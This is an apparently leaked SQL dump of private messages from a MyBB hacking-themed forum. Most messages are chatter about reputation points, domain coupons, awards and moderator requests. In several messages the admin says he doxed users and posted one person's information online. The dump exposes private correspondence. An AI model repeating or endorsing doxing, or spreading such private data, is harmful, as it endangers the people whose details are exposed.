jok3r\']\r\n[quote=\'treyz123456789\']\r\nSORRY FOR THE NOOBNESS BUT HOW DO YOU +REP PEOPLE ON L33THACKING \r\nON UBER FORUMS I KNOW HOW TO \r\n[/quote]\r\n\r\nSame way. You go to their profile and click on rate. You can\'t rep because you aren\'t upgraded but you can rep now because I upgraded your account.\r\n[/quote]\r\nare you sure you upgraded me because i still cant +rep people\r\n[/quote]\r\n\r\nI forgot to upgrade because I got busy with some other stuff. ', '1350168877', '0', '3', '1350183322', '1', '0', '0', '1350183229'); INSERT INTO mybb_privatemessages VALUES('3423', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Awards', '0', '[quote=\'t3h jok3r\']\r\nLook I\'m going to tell you for the last time, the next time you talk about the awards system then I will give you a warning. \r\n[/quote]\r\n\r\nsorry im just so excited :)', '1350616880', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3424', '257', '257', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: Awards', '0', '[quote=\'?(???)?TREYZ?(???)?\']\r\n[quote=\'t3h jok3r\']\r\nLook I\'m going to tell you for the last time, the next time you talk about the awards system then I will give you a warning. \r\n[/quote]\r\n\r\nsorry im just so excited :)\r\n[/quote]\r\n\r\nI can understand but it\'s annoying. ', '1350617128', '0', '3', '1350617483', '1', '0', '0', '1350617463'); INSERT INTO mybb_privatemessages VALUES('3106', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Domain Register', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo bro, I was wondering if you had a credit card or debit card linked to your paypal? I am trying to register a domain name from here http://www.networksolutions.com/domain-name-registration/PS-domains.jsp?siteid=181&channelid=P13C181S570N0B9A1D761E0000V118&promo=NCDISC0020&gclid=CPGLh-yl_bICFZGPPAoddykA8w&clickid=1775329792 but I need a credit card or debit card on my paypal. I will send you the money or you could just buy it for me.\r\n[/quote]\r\n\r\nLooks like a scam anyway I only use a unverified canadian PP\r\n[/quote]\r\nOh, could you find the cheapest place to buy a domain name or get a coupon for me please? Thanks\r\n[/quote]\r\n\r\nNetfirms: LOVE \r\n\r\nNamecheap: $4 domain registration for one year with free whoisguard protection.\r\n[/quote]\r\nThe domain I want says 10.69 a year on namecheap.', '1350169229', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3107', '3', '3', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '1', 'Re: Domain Register', '0', '[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo bro, I was wondering if you had a credit card or debit card linked to your paypal? I am trying to register a domain name from here http://www.networksolutions.com/domain-name-registration/PS-domains.jsp?siteid=181&channelid=P13C181S570N0B9A1D761E0000V118&promo=NCDISC0020&gclid=CPGLh-yl_bICFZGPPAoddykA8w&clickid=1775329792 but I need a credit card or debit card on my paypal. I will send you the money or you could just buy it for me.\r\n[/quote]\r\n\r\nLooks like a scam anyway I only use a unverified canadian PP\r\n[/quote]\r\nOh, could you find the cheapest place to buy a domain name or get a coupon for me please? Thanks\r\n[/quote]\r\n\r\nNetfirms: LOVE \r\n\r\nNamecheap: $4 domain registration for one year with free whoisguard protection.\r\n[/quote]\r\nThe domain I want says 10.69 a year on namecheap.\r\n[/quote]\r\n\r\nUhh I have no idea.', '1350169527', '0', '3', '1350170269', '1', '0', '0', '1350170256'); INSERT INTO mybb_privatemessages VALUES('3421', '82', '82', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'Re: codingcomputing', '0', '[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\nSup\r\n\r\nI joined this new forum, you will figure out why I joined when you see it. I\'m a mod on his site and helping him out because he is not that experienced with MyBB etc. He\'s site is new and he needs someone really active like you.\r\n\r\nI was wondering if you want to help him out with his activity?\r\n[/quote]\r\n\r\nNot interested right now.. Having thoughts.\r\n[/quote]\r\n\r\nNo problem. ', '1350616821', '0', '1', '0', '1', '0', '0', '1350616859'); INSERT INTO mybb_privatemessages VALUES('3109', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Domain Register', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo bro, I was wondering if you had a credit card or debit card linked to your paypal? I am trying to register a domain name from here http://www.networksolutions.com/domain-name-registration/PS-domains.jsp?siteid=181&channelid=P13C181S570N0B9A1D761E0000V118&promo=NCDISC0020&gclid=CPGLh-yl_bICFZGPPAoddykA8w&clickid=1775329792 but I need a credit card or debit card on my paypal. I will send you the money or you could just buy it for me.\r\n[/quote]\r\n\r\nLooks like a scam anyway I only use a unverified canadian PP\r\n[/quote]\r\nOh, could you find the cheapest place to buy a domain name or get a coupon for me please? Thanks\r\n[/quote]\r\n\r\nNetfirms: LOVE \r\n\r\nNamecheap: $4 domain registration for one year with free whoisguard protection.\r\n[/quote]\r\nThe domain I want says 10.69 a year on namecheap.\r\n[/quote]\r\n\r\nUhh I have no idea.\r\n[/quote]\r\nThat is weird', '1350170269', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3110', '3', '3', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '1', 'Re: Domain Register', '0', '[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo bro, I was wondering if you had a credit card or debit card linked to your paypal? I am trying to register a domain name from here http://www.networksolutions.com/domain-name-registration/PS-domains.jsp?siteid=181&channelid=P13C181S570N0B9A1D761E0000V118&promo=NCDISC0020&gclid=CPGLh-yl_bICFZGPPAoddykA8w&clickid=1775329792 but I need a credit card or debit card on my paypal. I will send you the money or you could just buy it for me.\r\n[/quote]\r\n\r\nLooks like a scam anyway I only use a unverified canadian PP\r\n[/quote]\r\nOh, could you find the cheapest place to buy a domain name or get a coupon for me please? Thanks\r\n[/quote]\r\n\r\nNetfirms: LOVE \r\n\r\nNamecheap: $4 domain registration for one year with free whoisguard protection.\r\n[/quote]\r\nThe domain I want says 10.69 a year on namecheap.\r\n[/quote]\r\n\r\nUhh I have no idea.\r\n[/quote]\r\nThat is weird\r\n[/quote]\r\n\r\nThey making fake promises lol.', '1350170586', '0', '3', '1350170715', '1', '0', '0', '1350170622'); INSERT INTO mybb_privatemessages VALUES('3418', '257', '257', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Awards', '0', 'Look I\'m going to tell you for the last time, the next time you talk about the awards system then I will give you a warning. ', '1350613817', '0', '3', '1350616880', '1', '0', '0', '1350615640'); INSERT INTO mybb_privatemessages VALUES('3420', '82', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: codingcomputing', '0', '[quote=\'t3h jok3r\']\r\nSup\r\n\r\nI joined this new forum, you will figure out why I joined when you see it. I\'m a mod on his site and helping him out because he is not that experienced with MyBB etc. He\'s site is new and he needs someone really active like you.\r\n\r\nI was wondering if you want to help him out with his activity?\r\n[/quote]\r\n\r\nNot interested right now.. Having thoughts.', '1350616702', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3112', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Domain Register', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo bro, I was wondering if you had a credit card or debit card linked to your paypal? I am trying to register a domain name from here http://www.networksolutions.com/domain-name-registration/PS-domains.jsp?siteid=181&channelid=P13C181S570N0B9A1D761E0000V118&promo=NCDISC0020&gclid=CPGLh-yl_bICFZGPPAoddykA8w&clickid=1775329792 but I need a credit card or debit card on my paypal. I will send you the money or you could just buy it for me.\r\n[/quote]\r\n\r\nLooks like a scam anyway I only use a unverified canadian PP\r\n[/quote]\r\nOh, could you find the cheapest place to buy a domain name or get a coupon for me please? Thanks\r\n[/quote]\r\n\r\nNetfirms: LOVE \r\n\r\nNamecheap: $4 domain registration for one year with free whoisguard protection.\r\n[/quote]\r\nThe domain I want says 10.69 a year on namecheap.\r\n[/quote]\r\n\r\nUhh I have no idea.\r\n[/quote]\r\nThat is weird\r\n[/quote]\r\n\r\nThey making fake promises lol.\r\n[/quote]\r\nLOL yea they sure are', '1350170715', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3113', '82', '82', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'Avatar', '0', 'I\'m making you a special avatar, you will love it for sure. It\'s based on something you like the most, stay online or come on Skype. ', '1350170726', '0', '3', '1350170852', '1', '0', '0', '1350170789'); INSERT INTO mybb_privatemessages VALUES('3417', '257', '257', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: MINECRAFT PREMIUM ', '0', '[quote=\'?(???)?TREYZ?(???)?\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'?(???)?TREYZ?(???)?\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'?(???)?TREYZ?(???)?\']\r\nwould you like a minecraft premium i been giving alot away lately \r\nand i forgot to give you one. :O \r\n[/quote]\r\n\r\nNope but thanks for the offer. You can start one giveaway if you want in the gamers private forum.\r\n[/quote]\r\ni have done 3 giveaways now \r\n[/quote]\r\n\r\nThat\'s cool. Thanks for contributing.\r\n[/quote]\r\n\r\nno worries are we advertising because its a bit inactive\r\n[/quote]\r\n\r\nWhat\'s inactive? ', '1350612087', '0', '1', '0', '1', '0', '0', '1350612504'); INSERT INTO mybb_privatemessages VALUES('3115', '82', '82', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'Re: Avatar', '0', '[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\nI\'m making you a special avatar, you will love it for sure. It\'s based on something you like the most, stay online or come on Skype. \r\n[/quote]\r\n\r\nI don\'t know why.. -.-\r\nIf this is supposed to be an apology for doxing me, then I don\'t know...\r\nYou could\'ve let Anarchist dox me. Instead of you doing it for me, you basically threw away the friendship..\r\n[/quote]\r\n\r\nI\'m not doing it for the sake of apologizing, I have his DOX and already got him booted off for 24 hours and his info is online in the dark web. I was making some avatars for the community and planned on making your one public but I made it private for you only. If you don\'t want it then I\'ll give it someone else. ', '1350171506', '0', '3', '1350171661', '1', '0', '0', '1350171599'); INSERT INTO mybb_privatemessages VALUES('3416', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: MINECRAFT PREMIUM ', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'?(???)?TREYZ?(???)?\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'?(???)?TREYZ?(???)?\']\r\nwould you like a minecraft premium i been giving alot away lately \r\nand i forgot to give you one. :O \r\n[/quote]\r\n\r\nNope but thanks for the offer. You can start one giveaway if you want in the gamers private forum.\r\n[/quote]\r\ni have done 3 giveaways now \r\n[/quote]\r\n\r\nThat\'s cool. Thanks for contributing.\r\n[/quote]\r\n\r\nno worries are we advertising because its a bit inactive', '1350611883', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3117', '3', '3', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '1', 'Re: Domain Register', '0', '[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo bro, I was wondering if you had a credit card or debit card linked to your paypal? I am trying to register a domain name from here http://www.networksolutions.com/domain-name-registration/PS-domains.jsp?siteid=181&channelid=P13C181S570N0B9A1D761E0000V118&promo=NCDISC0020&gclid=CPGLh-yl_bICFZGPPAoddykA8w&clickid=1775329792 but I need a credit card or debit card on my paypal. I will send you the money or you could just buy it for me.\r\n[/quote]\r\n\r\nLooks like a scam anyway I only use a unverified canadian PP\r\n[/quote]\r\nOh, could you find the cheapest place to buy a domain name or get a coupon for me please? Thanks\r\n[/quote]\r\n\r\nNetfirms: LOVE \r\n\r\nNamecheap: $4 domain registration for one year with free whoisguard protection.\r\n[/quote]\r\nThe domain I want says 10.69 a year on namecheap.\r\n[/quote]\r\n\r\nUhh I have no idea.\r\n[/quote]\r\nThat is weird\r\n[/quote]\r\n\r\nThey making fake promises lol.\r\n[/quote]\r\nLOL yea they sure are\r\n[/quote]\r\n\r\nI spoke to them and they said it\'s the STARTING PRICE.', '1350171655', '0', '3', '1350172571', '1', '0', '0', '1350172547'); INSERT INTO mybb_privatemessages VALUES('3119', '82', '82', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'Re: Avatar', '0', '[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\nI\'m making you a special avatar, you will love it for sure. It\'s based on something you like the most, stay online or come on Skype. \r\n[/quote]\r\n\r\nI don\'t know why.. -.-\r\nIf this is supposed to be an apology for doxing me, then I don\'t know...\r\nYou could\'ve let Anarchist dox me. Instead of you doing it for me, you basically threw away the friendship..\r\n[/quote]\r\n\r\nI\'m not doing it for the sake of apologizing, I have his DOX and already got him booted off for 24 hours and his info is online in the dark web. I was making some avatars for the community and planned on making your one public but I made it private for you only. If you don\'t want it then I\'ll give it someone else. \r\n[/quote]\r\n\r\nGet on Skype........\r\n[/quote]\r\n\r\nk', '1350172478', '0', '1', '0', '1', '0', '0', '1350173822'); INSERT INTO mybb_privatemessages VALUES('3413', '257', '257', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: MINECRAFT PREMIUM ', '0', '[quote=\'?(???)?TREYZ?(???)?\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'?(???)?TREYZ?(???)?\']\r\nwould you like a minecraft premium i been giving alot away lately \r\nand i forgot to give you one. :O \r\n[/quote]\r\n\r\nNope but thanks for the offer. You can start one giveaway if you want in the gamers private forum.\r\n[/quote]\r\ni have done 3 giveaways now \r\n[/quote]\r\n\r\nThat\'s cool. Thanks for contributing.', '1350611450', '0', '3', '1350611883', '1', '0', '0', '1350611846'); INSERT INTO mybb_privatemessages VALUES('3535', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: You have been granted an award.', '0', '[quote=\'t3h jok3r\']\r\nHi [b]xEP1C_SC0P3Sx[/b] You have been granted an award on [url=http://l33thacking.net][b]L33T Hacking[/b][/url] We thank you to not respond to this PM.\r\n\r\n-----------------------------\r\n\r\nName of award: Elite\r\nDescription: Special award to signify Elite status. \r\nAward Image: [img]http://l33thacking.net/inc/plugins/achivements/upload/custom_21_10_12_12_08_31.jpg[/img]\r\n\r\n-----------------------------\r\n\r\nThe award you have been given in an automatic way to remove it or hide it from your postbit / profile go to control panel and edit them.\r\n\r\n[/quote]\r\n\r\nThank you very much appreciated admin', '1350797365', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3121', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Domain Register', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo bro, I was wondering if you had a credit card or debit card linked to your paypal? I am trying to register a domain name from here http://www.networksolutions.com/domain-name-registration/PS-domains.jsp?siteid=181&channelid=P13C181S570N0B9A1D761E0000V118&promo=NCDISC0020&gclid=CPGLh-yl_bICFZGPPAoddykA8w&clickid=1775329792 but I need a credit card or debit card on my paypal. I will send you the money or you could just buy it for me.\r\n[/quote]\r\n\r\nLooks like a scam anyway I only use a unverified canadian PP\r\n[/quote]\r\nOh, could you find the cheapest place to buy a domain name or get a coupon for me please? Thanks\r\n[/quote]\r\n\r\nNetfirms: LOVE \r\n\r\nNamecheap: $4 domain registration for one year with free whoisguard protection.\r\n[/quote]\r\nThe domain I want says 10.69 a year on namecheap.\r\n[/quote]\r\n\r\nUhh I have no idea.\r\n[/quote]\r\nThat is weird\r\n[/quote]\r\n\r\nThey making fake promises lol.\r\n[/quote]\r\nLOL yea they sure are\r\n[/quote]\r\n\r\nI spoke to them and they said it\'s the STARTING PRICE.\r\n[/quote]\r\nDamn wtf, I dont have money like that I only have $5', '1350172571', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3123', '2', '224', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"224\";}}', '2', 'Re: Site', '0', '[quote=\'monkey\']\r\n[quote=\'Apathy\']\r\n[quote=\'monkey\']\r\n[quote=\'Apathy\']\r\n[quote=\'monkey\']\r\nHow much would it cost to buy the site DB so I can merge it with my site and to get it to redirect to my site? Serious question.\r\n[/quote]\r\nI have no idea sorry.\r\n[/quote]\r\n\r\nHow\'s $10?\r\n[/quote]\r\n\r\nI don\'t know contact the founder. \r\n[/quote]\r\n\r\nWhat\'s his user?\r\n[/quote]\r\nhttp://l33thacking.net/user-1.html', '1350173060', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3525', '3', '3', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '1', 'Re: Yo', '0', '[quote=\'??????????¢™\']\r\nHey Joker, I was wondering if you could send me the G3 Forums theme please.\r\n[/quote]\r\n\r\nI deleted it because I decided to stay on the current one. It\'s easy to RIP it though.', '1350789793', '0', '1', '0', '1', '0', '0', '1350837015'); INSERT INTO mybb_privatemessages VALUES('3127', '3', '3', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '1', 'Re: Domain Register', '0', '[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo bro, I was wondering if you had a credit card or debit card linked to your paypal? I am trying to register a domain name from here http://www.networksolutions.com/domain-name-registration/PS-domains.jsp?siteid=181&channelid=P13C181S570N0B9A1D761E0000V118&promo=NCDISC0020&gclid=CPGLh-yl_bICFZGPPAoddykA8w&clickid=1775329792 but I need a credit card or debit card on my paypal. I will send you the money or you could just buy it for me.\r\n[/quote]\r\n\r\nLooks like a scam anyway I only use a unverified canadian PP\r\n[/quote]\r\nOh, could you find the cheapest place to buy a domain name or get a coupon for me please? Thanks\r\n[/quote]\r\n\r\nNetfirms: LOVE \r\n\r\nNamecheap: $4 domain registration for one year with free whoisguard protection.\r\n[/quote]\r\nThe domain I want says 10.69 a year on namecheap.\r\n[/quote]\r\n\r\nUhh I have no idea.\r\n[/quote]\r\nThat is weird\r\n[/quote]\r\n\r\nThey making fake promises lol.\r\n[/quote]\r\nLOL yea they sure are\r\n[/quote]\r\n\r\nI spoke to them and they said it\'s the STARTING PRICE.\r\n[/quote]\r\nDamn wtf, I dont have money like that I only have $5\r\n[/quote]\r\n\r\nUse retailmenot.com for coupons.', '1350176463', '0', '3', '1350177233', '1', '0', '0', '1350176554'); INSERT INTO mybb_privatemessages VALUES('3524', '270', '270', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"270\";}}', '1', 'Re: Hi there.', '0', '[quote=\'LCS\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'LCS\']\r\n[quote=\'t3h jok3r\']\r\nHi,\r\n\r\nHow are you today? If you haven\'t received this PM yet, then how do you find L33T Hacking so far? Feel free to share your experience, ideas, feedback anything you like.\r\n[/quote]\r\nI\'m good. I think LH is awesome we just need a few more members. Can I suggest a dedicated tab to monetizing? I personally would want to make it as active as it can be; a few people know about what I love, and that is online monetizing.\r\n\r\nThanks! \r\n[/quote]\r\n\r\nTrue and the thing is that the monetizing section is not that active at the moment but we would add one when we get more active members.\r\n[/quote]\r\nI think that actually having a monetizing section could attract more members. I\'d post alot of tutorials/methods; and obviously I believe that it would help with the ranking on Google etc.\r\n[/quote]\r\n\r\nOK then if you start posting in the monetizing section then we would add a monetizing tab.', '1350789756', '0', '1', '0', '1', '0', '0', '1350844278'); INSERT INTO mybb_privatemessages VALUES('3130', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Domain Register', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo bro, I was wondering if you had a credit card or debit card linked to your paypal? I am trying to register a domain name from here http://www.networksolutions.com/domain-name-registration/PS-domains.jsp?siteid=181&channelid=P13C181S570N0B9A1D761E0000V118&promo=NCDISC0020&gclid=CPGLh-yl_bICFZGPPAoddykA8w&clickid=1775329792 but I need a credit card or debit card on my paypal. I will send you the money or you could just buy it for me.\r\n[/quote]\r\n\r\nLooks like a scam anyway I only use a unverified canadian PP\r\n[/quote]\r\nOh, could you find the cheapest place to buy a domain name or get a coupon for me please? Thanks\r\n[/quote]\r\n\r\nNetfirms: LOVE \r\n\r\nNamecheap: $4 domain registration for one year with free whoisguard protection.\r\n[/quote]\r\nThe domain I want says 10.69 a year on namecheap.\r\n[/quote]\r\n\r\nUhh I have no idea.\r\n[/quote]\r\nThat is weird\r\n[/quote]\r\n\r\nThey making fake promises lol.\r\n[/quote]\r\nLOL yea they sure are\r\n[/quote]\r\n\r\nI spoke to them and they said it\'s the STARTING PRICE.\r\n[/quote]\r\nDamn wtf, I dont have money like that I only have $5\r\n[/quote]\r\n\r\nUse retailmenot.com for coupons.\r\n[/quote]\r\nShould I use this one to see if it works cause its kinda old. http://www.retailmenot.com/showcoupon/1395608', '1350177233', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3410', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: MINECRAFT PREMIUM ', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'?(???)?TREYZ?(???)?\']\r\nwould you like a minecraft premium i been giving alot away lately \r\nand i forgot to give you one. :O \r\n[/quote]\r\n\r\nNope but thanks for the offer. You can start one giveaway if you want in the gamers private forum.\r\n[/quote]\r\ni have done 3 giveaways now ', '1350611067', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3132', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: HELP please', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'treyz123456789\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'treyz123456789\']\r\nSORRY FOR THE NOOBNESS BUT HOW DO YOU +REP PEOPLE ON L33THACKING \r\nON UBER FORUMS I KNOW HOW TO \r\n[/quote]\r\n\r\nSame way. You go to their profile and click on rate. You can\'t rep because you aren\'t upgraded but you can rep now because I upgraded your account.\r\n[/quote]\r\nare you sure you upgraded me because i still cant +rep people\r\n[/quote]\r\nwould you mind upgrading now please ;)\r\n\r\nI forgot to upgrade because I got busy with some other stuff. \r\n[/quote]', '1350183322', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3133', '3', '3', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '1', 'Re: Domain Register', '0', '[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo bro, I was wondering if you had a credit card or debit card linked to your paypal? I am trying to register a domain name from here http://www.networksolutions.com/domain-name-registration/PS-domains.jsp?siteid=181&channelid=P13C181S570N0B9A1D761E0000V118&promo=NCDISC0020&gclid=CPGLh-yl_bICFZGPPAoddykA8w&clickid=1775329792 but I need a credit card or debit card on my paypal. I will send you the money or you could just buy it for me.\r\n[/quote]\r\n\r\nLooks like a scam anyway I only use a unverified canadian PP\r\n[/quote]\r\nOh, could you find the cheapest place to buy a domain name or get a coupon for me please? Thanks\r\n[/quote]\r\n\r\nNetfirms: LOVE \r\n\r\nNamecheap: $4 domain registration for one year with free whoisguard protection.\r\n[/quote]\r\nThe domain I want says 10.69 a year on namecheap.\r\n[/quote]\r\n\r\nUhh I have no idea.\r\n[/quote]\r\nThat is weird\r\n[/quote]\r\n\r\nThey making fake promises lol.\r\n[/quote]\r\nLOL yea they sure are\r\n[/quote]\r\n\r\nI spoke to them and they said it\'s the STARTING PRICE.\r\n[/quote]\r\nDamn wtf, I dont have money like that I only have $5\r\n[/quote]\r\n\r\nUse retailmenot.com for coupons.\r\n[/quote]\r\nShould I use this one to see if it works cause its kinda old. http://www.retailmenot.com/showcoupon/1395608\r\n[/quote]\r\n\r\nLast used 10 months ago and 2 years old. Then it\'s a private coupon by someone who is an affiliate member on their site so there\'s 95% chance that it would work.', '1350193721', '0', '3', '1350262560', '1', '0', '0', '1350262144'); INSERT INTO mybb_privatemessages VALUES('3134', '257', '257', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: HELP please', '0', '[quote=\'XxTREYZxX\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'treyz123456789\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'treyz123456789\']\r\nSORRY FOR THE NOOBNESS BUT HOW DO YOU +REP PEOPLE ON L33THACKING \r\nON UBER FORUMS I KNOW HOW TO \r\n[/quote]\r\n\r\nSame way. You go to their profile and click on rate. You can\'t rep because you aren\'t upgraded but you can rep now because I upgraded your account.\r\n[/quote]\r\nare you sure you upgraded me because i still cant +rep people\r\n[/quote]\r\nwould you mind upgrading now please ;)\r\n\r\nI forgot to upgrade because I got busy with some other stuff. \r\n[/quote]\r\n[/quote]\r\n\r\nI did it after I replied to the PM.', '1350193758', '0', '3', '1350198783', '1', '0', '0', '1350198758'); INSERT INTO mybb_privatemessages VALUES('3135', '62', '62', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Ipod', '0', 'Can you trust him?\r\n\r\nI released his DOX and all of a sudden why would he come back to a site where he has been kicked out of? I mean he was away for 3 days and now he all of a sudden left AF and came back to LH, a place which he hated the most? He even unblocked me on Skype but I removed him. Why would he unblock his enemy? I can\'t trust him. ', '1350195073', '0', '3', '1350230423', '1', '0', '0', '1350214238'); INSERT INTO mybb_privatemessages VALUES('3408', '2', '2', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '1', 'Skype', '0', 'Can you come on Skype?', '1350610892', '0', '3', '1350617431', '1', '0', '0', '1350617392'); INSERT INTO mybb_privatemessages VALUES('3137', '258', '1', '258', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Forum', '0', 'Ok mate i registered , if possible i would like to be Moderator or Staff at your forum :)\r\n\r\nIm Deltaforce fromm Ubers.org : http://www.ubers.org/member.php?action=profile&uid=7852\r\n\r\nI have had experience being moderator before at a hacking forum called Eliteguys\r\n\r\nHere is my eliteguys profile : http://www.eliteguys.org/User-XTr3ME-PiX3L\r\n\r\nAs you can see im mod there and i can help your forum grow so i would like to be Moderator or Staff on L33T Hacking :D I swear you will not regret it. I can post MANY HQ stuff there\r\n\r\nhere is my profile on L33T HACKING : http://l33thacking.net/user-258.html\r\n\r\nLooking forward to hearing from you ', '1350195521', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3138', '258', '258', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"258\";}}', '1', 'Re: Forum', '0', '[quote=\'XTr3ME PiX3L\']\r\nOk mate i registered , if possible i would like to be Moderator 